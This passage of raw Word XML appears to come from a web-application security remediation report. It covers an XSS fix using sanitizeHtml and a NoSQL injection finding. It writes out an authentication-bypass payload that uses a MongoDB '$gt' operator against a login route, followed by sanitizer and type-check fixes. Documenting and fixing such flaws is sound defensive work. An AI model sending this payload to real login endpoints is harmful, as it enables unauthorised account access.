        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>}),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731F4132" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">details: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>sanitizeHtml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>value.details</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve"> || "", {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11151287" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>allowedTags</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70748627" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>allowedAttributes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>: {}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414B8074" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="3A7C22" w:themeColor="accent6" w:themeShade="BF"/>
        </w:rPr>
        <w:t>})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707B8319" w14:textId="3B882802" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File</w:t>
      </w:r>
      <w:r w:rsidR="00BE7BE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:t>/server/routes/tickets.js</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434F876D" w14:textId="706122AD" w:rsidR="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Symbol" w:hAnsi="Segoe UI Symbol" w:cs="Segoe UI Symbol"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> XSS fully neutralized</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:t>Screenshots show escaped HTML entities (e.g., &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:t>lt;script</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:t>&amp;gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:t>;).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="590C61A9" w14:textId="77777777" w:rsidR="00BE7BE3" w:rsidRPr="00BE7BE3" w:rsidRDefault="00BE7BE3" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BF9307B" w14:textId="77777777" w:rsidR="004E318F" w:rsidRDefault="00EE11A0" w:rsidP="00EE11A0">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc214584808"/>
      <w:r w:rsidRPr="004E318F">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
        </w:rPr>
        <w:t>NoSQL Injection</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
    </w:p>
    <w:p w14:paraId="4EF7DEA7" w14:textId="7A80E819" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Attack Payload</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{ "</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">email": </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>{ "</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>": "</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>" }</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="C00000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4C5C61" w14:textId="59FCAF56" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Where Used</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Login route POST /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/auth/login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157E5BFF" w14:textId="3334FFB2" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Impact of Vulnerability</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Could cause MongoDB to treat $</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>gt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> operator as a query condition →possible authentication bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9BF7EA" w14:textId="60B1BA4A" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fix 1</w:t>
      </w:r>
      <w:r w:rsidR="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Custom NoSQL Sanitizer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1982A147" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>In server.js:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4371EF65" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>key.startsWith</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t xml:space="preserve">("$") || </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>key.includes</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t xml:space="preserve">(".")) delete </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>obj</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>[key</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>];</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="04F9BDED" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">This fully removes $ </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> keys before reaching MongoDB.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF7E477" w14:textId="3ED91307" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fix 2</w:t>
      </w:r>
      <w:r w:rsidR="001A651C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Type Checks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7004B259" w14:textId="77777777" w:rsidR="003A327C" w:rsidRPr="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>if (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>typeof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>email !</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="196B24" w:themeColor="accent3"/>
        </w:rPr>
        <w:t>== "string") return invalid</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6747C802" w14:textId="0A9DF802" w:rsidR="003A327C" w:rsidRDefault="003A327C" w:rsidP="00BE7BE3">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:r w:rsidR="00BE7BE3" w:rsidRPr="00BE7BE3">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="003A327C">
        <w:rPr>
          <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/server/server.js</w:t>
      </w:r>
      <w:r w:rsidR="00BE7BE3" w:rsidRPr="00BE7BE3">
        <w:rPr>
